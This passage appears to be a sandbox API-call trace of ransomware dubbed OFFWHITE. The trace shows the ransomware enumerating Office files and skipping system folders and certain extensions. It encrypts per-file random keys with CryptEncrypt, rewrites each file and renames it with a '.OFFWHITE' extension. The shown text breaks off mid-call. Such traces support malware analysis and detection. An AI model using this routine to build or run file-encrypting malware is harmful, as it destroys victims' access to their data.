lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2=".") returned 1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="..") returned 1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="...") returned 1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="windows") returned -1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="rsa") returned -1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="programdata") returned -1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="appdata") returned 1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="program files") returned -1 [0145.866] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="program files (x86)") returned -1 [0145.866] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.866] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="PPINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" [0145.866] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.866] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.867] PathFindExtensionW (pszPath="PPINTL.REST.trx_dll") returned=".trx_dll" [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.867] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.867] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.867] GetProcessHeap () returned 0x500000 [0145.867] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e58 [0145.867] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.949] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=275808) returned 1 [0145.949] GetProcessHeap () returned 0x500000 [0145.949] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.949] GetProcessHeap () returned 0x500000 [0145.949] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.949] GetProcessHeap () returned 0x500000 [0145.949] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.949] GetProcessHeap () returned 0x500000 [0145.949] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.950] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.950] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.950] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.950] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.950] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.950] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.950] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.950] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.950] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.950] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.950] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.950] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.951] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x43560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.951] SetLastError (dwErrCode=0x0) [0145.951] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.953] GetLastError () returned 0x0 [0145.953] GetLastError () returned 0x0 [0145.953] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x43660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.953] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.954] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x43760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.954] WriteFile (in: hFile=0x218, lpBuffer=0x546e58*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e58*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.954] GetProcessHeap () returned 0x500000 [0145.954] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x43560) returned 0x5607c8 [0145.954] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.954] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x43560, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x43560, lpOverlapped=0x0) returned 1 [0145.977] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.978] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x43560, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x43560, lpOverlapped=0x0) returned 1 [0145.980] GetProcessHeap () returned 0x500000 [0145.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0145.980] CloseHandle (hObject=0x218) returned 1 [0145.980] GetProcessHeap () returned 0x500000 [0145.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0145.980] GetProcessHeap () returned 0x500000 [0145.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0145.980] GetProcessHeap () returned 0x500000 [0145.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0145.980] GetProcessHeap () returned 0x500000 [0145.980] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0145.980] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" [0145.980] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.OFFWHITE" [0145.980] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.offwhite")) returned 1 [0145.981] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58968200, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x58968200, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a560, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0145.981] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".") returned 1 [0145.981] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="..") returned 1 [0145.981] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="...") returned 1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="windows") returned -1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="rsa") returned -1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="programdata") returned 1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="appdata") returned 1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="program files") returned 1 [0145.982] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="program files (x86)") returned 1 [0145.982] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0145.982] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="PUB6INTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" [0145.982] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.982] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.982] PathFindExtensionW (pszPath="PUB6INTL.DLL.trx_dll") returned=".trx_dll" [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0145.982] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0145.983] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0145.983] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0145.983] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0145.983] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0145.983] GetProcessHeap () returned 0x500000 [0145.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e68 [0145.983] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0145.983] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=107872) returned 1 [0145.983] GetProcessHeap () returned 0x500000 [0145.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0145.983] GetProcessHeap () returned 0x500000 [0145.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0145.983] GetProcessHeap () returned 0x500000 [0145.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0145.983] GetProcessHeap () returned 0x500000 [0145.983] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0145.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.984] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0145.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.984] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0145.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.984] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0145.984] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0145.984] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0145.984] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0145.985] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.985] SetLastError (dwErrCode=0x0) [0145.985] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.988] GetLastError () returned 0x0 [0145.988] GetLastError () returned 0x0 [0145.988] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a660, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.988] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0145.988] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x1a760, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.988] WriteFile (in: hFile=0x218, lpBuffer=0x546e68*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x546e68*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0145.988] GetProcessHeap () returned 0x500000 [0145.988] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1a560) returned 0x5607c8 [0145.988] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.988] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x1a560, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x1a560, lpOverlapped=0x0) returned 1 [0146.000] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.000] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x1a560, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x1a560, lpOverlapped=0x0) returned 1 [0146.001] GetProcessHeap () returned 0x500000 [0146.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0146.001] CloseHandle (hObject=0x218) returned 1 [0146.001] GetProcessHeap () returned 0x500000 [0146.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0146.001] GetProcessHeap () returned 0x500000 [0146.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0146.001] GetProcessHeap () returned 0x500000 [0146.001] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0146.001] GetProcessHeap () returned 0x500000 [0146.002] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0146.002] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" [0146.002] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.OFFWHITE" [0146.002] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.offwhite")) returned 1 [0146.003] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57655500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57655500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x87f60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="..") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="...") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="windows") returned -1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="rsa") returned -1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="programdata") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="appdata") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="program files") returned 1 [0146.003] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="program files (x86)") returned 1 [0146.003] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\" [0146.003] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpString2="PUB6INTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" [0146.003] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.003] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.003] PathFindExtensionW (pszPath="PUB6INTL.REST.trx_dll") returned=".trx_dll" [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0146.003] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0146.004] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0146.004] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.004] GetProcessHeap () returned 0x500000 [0146.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546e78 [0146.004] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0146.004] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=556896) returned 1 [0146.004] GetProcessHeap () returned 0x500000 [0146.004] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.004] GetProcessHeap () returned 0x500000 [0146.005] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.005] GetProcessHeap () returned 0x500000 [0146.005] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.005] GetProcessHeap () returned 0x500000 [0146.005] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.005] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.005] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.005] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.005] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.005] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.005] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.005] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.005] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.005] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | 